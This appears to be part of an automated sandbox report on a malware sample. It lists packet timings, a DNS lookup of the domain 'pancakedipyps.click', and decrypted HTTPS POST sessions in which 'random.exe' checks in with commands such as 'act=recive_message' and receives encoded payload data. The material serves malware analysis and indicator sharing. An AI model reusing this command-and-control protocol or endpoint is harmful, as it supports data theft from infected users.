Jan 8, 2025 11:47:02.401367903 CET	49740	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:02.401400089 CET	443	49740	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:03.018543005 CET	443	49740	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:03.018657923 CET	443	49740	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:03.018719912 CET	49740	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:03.051808119 CET	49740	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:03.051834106 CET	443	49740	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:03.434041977 CET	49742	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:03.434077024 CET	443	49742	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:03.434143066 CET	49742	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:03.434894085 CET	49742	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:03.434906006 CET	443	49742	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:03.904181957 CET	443	49742	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:03.904266119 CET	49742	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:03.905587912 CET	49742	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:03.905597925 CET	443	49742	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:03.905864954 CET	443	49742	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:03.907150030 CET	49742	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:03.907320023 CET	49742	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:03.907356024 CET	443	49742	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:03.907427073 CET	49742	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:03.907437086 CET	443	49742	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:04.546026945 CET	443	49742	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:04.546144009 CET	443	49742	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:04.546197891 CET	49742	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:04.546375036 CET	49742	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:04.546386003 CET	443	49742	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:04.671930075 CET	49744	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:04.671953917 CET	443	49744	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:04.672025919 CET	49744	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:04.672364950 CET	49744	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:04.672379971 CET	443	49744	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:05.130980015 CET	443	49744	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:05.131057978 CET	49744	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:05.132420063 CET	49744	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:05.132427931 CET	443	49744	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:05.132690907 CET	443	49744	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:05.134104013 CET	49744	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:05.134237051 CET	49744	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:05.134241104 CET	443	49744	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:05.600128889 CET	443	49744	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:05.600213051 CET	443	49744	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:05.600270033 CET	49744	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:05.600485086 CET	49744	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:05.600495100 CET	443	49744	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:05.888276100 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:05.888307095 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:05.888390064 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:05.888765097 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:05.888777971 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:06.348023891 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:06.348119020 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.349468946 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.349478960 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:06.349720955 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:06.351061106 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.351819038 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.351855993 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:06.351986885 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.352047920 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:06.352174997 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.352215052 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:06.352368116 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.352394104 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:06.352560043 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.352590084 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:06.352746964 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.352786064 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:06.352794886 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.352993965 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.353027105 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.362267971 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:06.362437963 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.362482071 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:06.362482071 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.362499952 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:06.362509012 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.362550020 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:06.362617970 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.362667084 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.362698078 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.367368937 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:06.367461920 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:06.367479086 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:09.938153028 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:09.938327074 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:09.938388109 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:09.938466072 CET	49746	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:09.938486099 CET	443	49746	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:09.943063974 CET	49749	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:09.943105936 CET	443	49749	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:09.943186045 CET	49749	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:09.943487883 CET	49749	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:09.943501949 CET	443	49749	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:10.415599108 CET	443	49749	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:10.415668964 CET	49749	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:10.417073011 CET	49749	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:10.417083025 CET	443	49749	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:10.417325974 CET	443	49749	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:10.418720961 CET	49749	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:10.418740034 CET	49749	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:10.418797970 CET	443	49749	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:10.911024094 CET	443	49749	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:10.911118984 CET	443	49749	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:10.911195993 CET	49749	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:10.911396027 CET	49749	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:10.911415100 CET	443	49749	188.114.97.3	192.168.2.4
Jan 8, 2025 11:47:10.911425114 CET	49749	443	192.168.2.4	188.114.97.3
Jan 8, 2025 11:47:10.911429882 CET	443	49749	188.114.97.3	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 11:46:57.113786936 CET	58005	53	192.168.2.4	1.1.1.1
Jan 8, 2025 11:46:57.128448009 CET	53	58005	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 11:46:57.113786936 CET	192.168.2.4	1.1.1.1	0x6c3a	Standard query (0)	pancakedipyps.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 11:46:57.128448009 CET	1.1.1.1	192.168.2.4	0x6c3a	No error (0)	pancakedipyps.click		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 8, 2025 11:46:57.128448009 CET	1.1.1.1	192.168.2.4	0x6c3a	No error (0)	pancakedipyps.click		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pancakedipyps.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	188.114.97.3	443	6940	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 10:46:57 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: pancakedipyps.click
2025-01-08 10:46:57 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-08 10:46:58 UTC	1127	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 10:46:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5fi0jkh2fcbt18c29heokdngmk; expires=Sun, 04 May 2025 04:33:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0m%2Fw%2B7oVsiZeJ1asc6oPMtGMkkMp23HkWE3yn5cKyDdgcGS2ivQ%2BtR0N8kYnBdJX8zmZ7iQjTmp5v5Iz2XxcWie55RpoOUtjZUwK6tiDgH%2BOw9DmO9vPuAQjP4fzAq5IZNgB79fh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8feb9b536d6943bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1565&rtt_var=595&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=910&delivery_rate=1825000&cwnd=228&unsent_bytes=0&cid=d5516da2620a954d&ts=581&x=0"
2025-01-08 10:46:58 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-08 10:46:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	188.114.97.3	443	6940	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 10:46:58 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 46 Host: pancakedipyps.click
2025-01-08 10:46:58 UTC	46	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
2025-01-08 10:46:59 UTC	1127	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 10:46:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jrhdt0udvlq7htt2a7t6dq89jo; expires=Sun, 04 May 2025 04:33:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zpf4GDwKLyNRLhQmLJGlbK67Vu%2F2iMs6o5I43vLLxESn9xmM4S9ohAeCl1LGyd%2FNTxswjBLdAJVuxIRo%2BBjjgZpPKBoWyVaOJhsmXgDHezgAyBxY1cjwDEGRDnCb4kCLU%2FAY1wym"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8feb9b599aa85e73-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1685&rtt_var=663&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=949&delivery_rate=1611479&cwnd=201&unsent_bytes=0&cid=e49de2340ffd6c2c&ts=486&x=0"
2025-01-08 10:46:59 UTC	242	IN	Data Raw: 31 63 39 61 0d 0a 54 30 66 67 4e 6b 6f 65 4b 73 54 33 41 74 6d 6e 65 5a 77 35 33 49 31 67 50 34 39 6e 69 53 57 44 6d 36 70 53 73 50 2b 6e 48 30 55 30 5a 5a 59 55 63 43 6f 47 35 6f 52 6e 2b 35 30 4e 37 6b 79 35 6f 55 4a 65 36 30 57 7a 51 2b 4c 33 32 54 65 63 33 64 46 79 5a 33 55 68 67 56 6f 35 65 77 62 6d 6b 6e 72 37 6e 53 4c 6e 47 37 6e 6a 51 67 57 74 41 75 4e 48 34 76 66 49 4d 39 75 51 31 33 4d 6d 4a 79 75 48 58 69 39 39 54 71 57 62 62 37 7a 43 48 50 31 54 73 75 51 4e 56 2b 4a 46 70 51 66 6d 34 59 68 6f 6b 72 4c 43 61 79 51 43 4a 70 4e 64 61 47 4d 47 76 39 56 6e 74 34 56 44 76 6c 69 35 37 77 78 5a 36 77 7a 68 54 65 76 2f 79 54 62 61 6a 38 35 35 4c 53 63 6c 68 46 38 6c 64 46 71 6f 6b 57 69 33 78 42 62 39 47 2f 43 76 Data Ascii: 1c9aT0fgNkoeKsT3AtmneZw53I1gP49niSWDm6pSsP+nH0U0ZZYUcCoG5oRn+50N7ky5oUJe60WzQ+L32Tec3dFyZ3UhgVo5ewbmknr7nSLnG7njQgWtAuNH4vfIM9uQ13MmJyuHXi99TqWbb7zCHP1TsuQNV+JFpQfm4YhokrLCayQCJpNdaGMGv9Vnt4VDvli57wxZ6wzhTev/yTbaj855LSclhF8ldFqokWi3xBb9G/Cv
2025-01-08 10:46:59 UTC	1369	IN	Data Raw: 42 55 57 74 58 61 73 55 30 2f 72 5a 49 63 65 51 31 58 74 6e 4d 6d 75 62 46 43 39 77 43 50 37 56 61 4c 66 4c 48 76 31 55 75 65 34 43 54 2b 49 46 36 45 2f 70 2f 63 49 2f 33 5a 4c 4c 64 79 41 6c 4c 49 56 62 4c 33 52 4f 71 5a 59 67 39 59 55 63 35 68 76 6d 72 79 4a 4e 37 67 62 2f 53 76 43 35 31 33 37 4c 33 63 4a 78 5a 33 56 6c 68 46 6f 70 63 55 69 30 6e 57 75 77 77 41 6e 31 55 72 50 69 41 6c 44 6e 43 75 68 48 35 76 50 43 50 39 69 5a 79 48 41 68 4c 53 58 43 47 6d 68 37 55 4f 62 4e 49 4a 6a 41 43 2f 6c 58 71 4b 30 34 48 66 4a 4c 38 67 66 6d 39 59 68 6f 6b 70 58 41 66 69 51 6d 4b 6f 46 63 49 32 35 49 74 4a 4e 74 76 74 63 64 2b 31 57 30 37 42 42 58 34 77 50 6f 54 75 72 77 7a 54 66 57 33 59 73 39 49 44 56 6c 32 68 51 4a 63 55 4f 71 6e 33 65 37 68 51 53 77 51 76 37 Data Ascii: BUWtXasU0/rZIceQ1XtnMmubFC9wCP7VaLfLHv1Uue4CT+IF6E/p/cI/3ZLLdyAlLIVbL3ROqZYg9YUc5hvmryJN7gb/SvC5137L3cJxZ3VlhFopcUi0nWuwwAn1UrPiAlDnCuhH5vPCP9iZyHAhLSXCGmh7UObNIJjAC/lXqK04HfJL8gfm9YhokpXAfiQmKoFcI25ItJNtvtcd+1W07BBX4wPoTurwzTfW3Ys9IDVl2hQJcUOqn3e7hQSwQv7
2025-01-08 10:46:59 UTC	1369	IN	Data Raw: 77 50 6b 53 75 32 35 68 6e 44 56 68 59 55 6c 5a 77 63 6d 6c 6c 63 69 50 6e 32 6c 6d 32 36 38 30 31 76 68 46 61 65 76 42 56 47 74 58 61 74 4b 34 50 48 4f 49 74 32 51 78 6e 4d 70 49 69 43 4e 58 43 68 38 52 61 4f 52 61 37 44 47 46 76 70 4a 74 4f 38 4b 57 4f 77 50 34 51 65 76 75 63 38 6f 6b 73 57 46 54 44 41 6d 5a 37 64 58 4a 6e 4a 50 73 4e 56 2f 39 64 78 62 2b 56 66 2b 74 30 4a 51 35 51 44 75 53 4f 44 7a 78 6a 58 59 6b 63 31 7a 4a 44 38 71 68 6c 51 6b 64 45 4b 72 6d 32 53 7a 7a 42 44 31 58 62 37 75 43 42 32 6a 52 65 78 66 6f 61 47 49 42 4e 57 52 79 48 4a 6c 47 43 61 4d 57 69 39 71 43 4c 6e 62 65 66 76 43 46 37 34 44 2f 75 4d 4c 58 65 59 50 37 30 66 6d 39 4d 30 7a 31 5a 37 49 65 69 30 6a 49 6f 5a 59 49 58 46 4f 70 70 4a 6b 76 74 63 65 39 31 65 79 72 30 77 64 Data Ascii: wPkSu25hnDVhYUlZwcmllciPn2lm26801vhFaevBVGtXatK4PHOIt2QxnMpIiCNXCh8RaORa7DGFvpJtO8KWOwP4Qevuc8oksWFTDAmZ7dXJnJPsNV/9dxb+Vf+t0JQ5QDuSODzxjXYkc1zJD8qhlQkdEKrm2SzzBD1Xb7uCB2jRexfoaGIBNWRyHJlGCaMWi9qCLnbefvCF74D/uMLXeYP70fm9M0z1Z7Iei0jIoZYIXFOppJkvtce91eyr0wd
2025-01-08 10:46:59 UTC	1369	IN	Data Raw: 6e 34 75 63 38 38 6b 73 57 46 64 43 34 2f 4b 34 78 64 4a 58 70 41 6f 5a 74 74 73 4d 4d 51 2b 56 79 34 34 67 70 51 36 41 62 71 51 2b 76 72 79 7a 76 59 6b 4d 38 39 61 57 30 69 6d 68 52 77 50 47 2b 71 76 48 43 67 31 77 32 2b 52 50 44 32 51 6c 72 68 52 62 4d 48 34 76 62 42 50 39 71 56 79 6e 49 6a 49 79 4f 45 57 53 31 7a 51 72 53 64 62 72 62 4f 46 50 56 4a 76 75 49 47 55 65 6b 4e 34 45 32 68 74 34 67 33 79 74 32 64 50 52 49 67 4b 6f 4a 58 50 6a 78 58 36 49 77 67 76 4d 6c 62 70 68 75 79 34 51 4a 53 34 51 6e 67 54 2b 44 31 78 6a 66 58 6c 4d 31 31 4e 53 77 68 69 6c 55 6d 63 30 6d 69 6b 47 57 2f 77 68 2f 34 56 50 36 68 51 6c 72 31 52 62 4d 48 7a 74 37 39 63 76 4f 6e 68 57 4a 70 4e 47 57 46 57 47 67 6b 43 4b 71 57 62 4c 50 4b 48 66 64 58 74 4f 59 4a 55 65 59 42 35 Data Ascii: n4uc88ksWFdC4/K4xdJXpAoZttsMMQ+Vy44gpQ6AbqQ+vryzvYkM89aW0imhRwPG+qvHCg1w2+RPD2QlrhRbMH4vbBP9qVynIjIyOEWS1zQrSdbrbOFPVJvuIGUekN4E2ht4g3yt2dPRIgKoJXPjxX6IwgvMlbphuy4QJS4QngT+D1xjfXlM11NSwhilUmc0mikGW/wh/4VP6hQlr1RbMHzt79cvOnhWJpNGWFWGgkCKqWbLPKHfdXtOYJUeYB5
2025-01-08 10:46:59 UTC	1369	IN	Data Raw: 48 4d 64 4f 62 31 33 6f 75 50 79 75 50 57 79 42 30 51 61 65 52 5a 62 62 44 46 2f 52 61 75 65 45 4d 56 61 31 4c 71 30 44 35 75 5a 42 77 38 34 33 65 62 7a 45 67 42 49 39 62 61 47 4d 47 76 39 56 6e 74 34 56 44 76 6c 4b 73 36 77 39 50 35 41 4c 6c 53 4f 4c 72 79 54 33 5a 6a 38 4a 79 49 79 6f 70 68 46 73 75 66 55 32 73 6d 57 65 2b 7a 68 54 79 47 2f 43 76 42 55 57 74 58 61 74 70 36 75 72 66 4d 39 79 57 30 32 5a 6e 4d 6d 75 62 46 43 39 77 43 50 37 56 59 37 44 4f 48 2f 35 58 76 75 73 50 58 66 38 4b 37 45 44 6f 38 74 6f 36 31 5a 72 4f 64 53 77 69 49 35 42 59 4a 6d 35 4e 74 49 63 67 39 59 55 63 35 68 76 6d 72 7a 52 61 2f 52 58 6f 42 64 44 76 79 79 62 5a 6b 4d 6b 39 4f 47 4d 38 77 6c 4d 6b 50 42 44 6d 6b 32 2b 79 78 68 54 2f 55 72 4c 69 42 31 54 6f 42 4f 31 44 36 2f Data Ascii: HMdOb13ouPyuPWyB0QaeRZbbDF/RaueEMVa1Lq0D5uZBw843ebzEgBI9baGMGv9Vnt4VDvlKs6w9P5ALlSOLryT3Zj8JyIyophFsufU2smWe+zhTyG/CvBUWtXatp6urfM9yW02ZnMmubFC9wCP7VY7DOH/5XvusPXf8K7EDo8to61ZrOdSwiI5BYJm5NtIcg9YUc5hvmrzRa/RXoBdDvyybZkMk9OGM8wlMkPBDmk2+yxhT/UrLiB1ToBO1D6/
2025-01-08 10:46:59 UTC	1369	IN	Data Raw: 33 64 6f 7a 50 6d 30 69 6a 68 52 77 50 45 75 68 6c 6d 47 78 7a 42 66 78 58 4c 72 39 43 46 72 2f 42 4f 70 4d 37 50 58 49 50 64 2b 58 78 48 51 71 49 53 69 46 55 79 64 35 43 4f 6a 56 5a 36 4f 46 51 37 35 36 73 2b 51 4f 42 72 64 46 39 41 6e 34 75 63 38 38 6b 73 57 46 66 53 30 6f 4c 34 39 58 4a 33 39 61 70 35 4e 79 75 38 67 52 37 46 47 31 36 67 39 51 34 41 62 74 51 65 72 31 32 6a 6e 53 6e 73 34 39 61 57 30 69 6d 68 52 77 50 47 75 78 67 32 71 38 79 51 33 31 57 72 33 35 44 30 32 74 53 36 74 57 35 75 69 49 61 4d 53 4e 30 6e 6f 34 59 7a 7a 43 55 79 51 38 45 4f 61 54 61 62 33 43 48 66 42 4a 75 2b 6b 4e 55 75 51 4d 37 30 2f 69 2b 63 77 30 31 5a 6a 47 63 53 77 71 4a 6f 31 51 49 58 4a 42 71 64 55 75 2b 38 49 44 76 67 50 2b 7a 68 6c 65 34 51 69 72 57 4b 2f 67 69 44 66 Data Ascii: 3dozPm0ijhRwPEuhlmGxzBfxXLr9CFr/BOpM7PXIPd+XxHQqISiFUyd5COjVZ6OFQ756s+QOBrdF9An4uc88ksWFfS0oL49XJ39ap5Nyu8gR7FG16g9Q4AbtQer12jnSns49aW0imhRwPGuxg2q8yQ31Wr35D02tS6tW5uiIaMSN0no4YzzCUyQ8EOaTab3CHfBJu+kNUuQM70/i+cw01ZjGcSwqJo1QIXJBqdUu+8IDvgP+zhle4QirWK/giDf
2025-01-08 10:46:59 UTC	243	IN	Data Raw: 57 64 31 5a 61 4a 66 50 6e 6c 50 73 4e 64 56 75 4d 73 56 2b 55 33 2b 38 44 30 54 72 51 72 78 42 37 6e 41 30 58 44 56 6b 59 55 6c 5a 7a 67 69 67 6c 4d 79 61 6b 2b 71 68 47 75 32 79 54 6e 78 58 4b 6a 73 44 56 37 38 44 4b 64 4d 37 4c 6d 47 63 4e 57 46 68 53 56 6e 41 69 4b 55 56 77 64 2f 57 61 2f 56 4c 76 76 43 44 62 34 44 2f 74 46 43 54 2b 34 56 36 45 6a 77 78 34 68 6f 79 36 4f 46 64 6a 45 71 4e 59 46 43 49 33 46 45 74 36 73 67 34 35 46 4a 72 41 6e 73 76 52 30 64 38 6a 71 6c 42 2b 43 35 6b 41 6e 4c 33 64 4d 39 66 33 39 72 77 6b 5a 6f 4a 41 6a 68 6c 6e 4b 70 77 78 6a 6f 57 50 6e 52 50 48 72 37 44 2b 78 58 35 75 37 48 63 4a 7a 64 79 6a 31 2f 46 47 57 4c 55 7a 4e 74 58 71 75 46 5a 2f 76 36 56 62 35 44 2f 72 64 43 61 4f 0d 0a Data Ascii: Wd1ZaJfPnlPsNdVuMsV+U3+8D0TrQrxB7nA0XDVkYUlZzgiglMyak+qhGu2yTnxXKjsDV78DKdM7LmGcNWFhSVnAiKUVwd/Wa/VLvvCDb4D/tFCT+4V6Ejwx4hoy6OFdjEqNYFCI3FEt6sg45FJrAnsvR0d8jqlB+C5kAnL3dM9f39rwkZoJAjhlnKpwxjoWPnRPHr7D+xX5u7HcJzdyj1/FGWLUzNtXquFZ/v6Vb5D/rdCaO
2025-01-08 10:46:59 UTC	1369	IN	Data Raw: 32 63 66 61 0d 0a 34 4c 35 55 44 33 36 49 55 58 78 4a 66 43 62 53 41 36 4b 73 49 61 61 48 6f 49 2f 73 59 75 2b 38 45 4b 76 67 50 75 76 56 6b 49 76 6c 4b 37 46 66 36 33 30 58 44 45 33 5a 30 76 61 57 30 33 77 67 78 6f 4f 30 75 30 68 32 61 34 30 78 69 35 5a 59 44 49 47 46 44 72 45 76 70 35 33 2f 37 53 50 64 53 4b 31 44 45 79 4c 69 75 4d 55 7a 34 38 42 75 61 61 49 4f 50 38 57 37 59 62 67 61 46 43 52 61 31 64 71 33 4c 69 39 38 59 33 78 49 79 49 57 6a 30 67 49 35 56 46 61 44 49 49 6f 4e 55 34 36 59 74 62 2b 6b 72 2b 74 31 49 50 74 6c 43 34 45 4c 47 72 31 33 37 4c 33 64 4d 39 66 33 39 72 77 6b 5a 6f 4a 41 6a 68 6c 6e 4b 70 77 78 6a 6f 57 50 6e 52 50 48 50 71 41 2b 35 41 38 62 76 6d 4f 38 61 61 68 54 4e 6e 49 6d 58 61 62 57 67 30 43 4a 6e 62 49 4b 4f 46 51 37 35 Data Ascii: 2cfa4L5UD36IUXxJfCbSA6KsIaaHoI/sYu+8EKvgPuvVkIvlK7Ff630XDE3Z0vaW03wgxoO0u0h2a40xi5ZYDIGFDrEvp53/7SPdSK1DEyLiuMUz48BuaaIOP8W7YbgaFCRa1dq3Li98Y3xIyIWj0gI5VFaDIIoNU46Ytb+kr+t1IPtlC4ELGr137L3dM9f39rwkZoJAjhlnKpwxjoWPnRPHPqA+5A8bvmO8aahTNnImXabWg0CJnbIKOFQ75
2025-01-08 10:46:59 UTC	1369	IN	Data Raw: 51 32 2f 47 71 56 65 6f 65 2b 49 61 49 44 54 68 57 39 6e 64 57 58 46 56 7a 70 75 54 71 57 44 59 2f 7a 37 4a 64 6c 56 75 65 34 55 54 66 6f 4b 31 58 6e 30 2b 73 59 2b 31 59 76 55 50 57 6c 74 4b 73 49 4d 45 54 77 41 35 71 6f 75 2b 39 31 62 70 68 75 4c 37 41 78 54 36 68 50 36 43 73 62 33 7a 7a 48 45 6a 64 4a 79 5a 32 4e 6c 68 42 52 77 4c 67 62 6d 6b 58 48 37 6e 55 75 73 41 4f 75 38 56 51 32 2f 47 71 56 65 6f 65 2b 49 61 49 44 54 68 57 39 6e 64 57 58 46 56 7a 70 75 54 71 57 44 59 2f 7a 37 4a 64 6c 56 75 65 34 55 54 66 6f 4b 70 47 6e 58 32 50 59 4f 78 35 37 4c 63 79 41 37 4e 4d 49 61 61 48 4d 49 2f 71 77 67 38 34 55 6b 73 42 75 6d 72 31 6f 64 32 41 62 6c 53 65 62 76 32 58 33 31 6b 38 4a 38 4d 54 30 79 6a 52 73 47 53 6d 6e 6d 32 79 43 39 68 55 4f 73 46 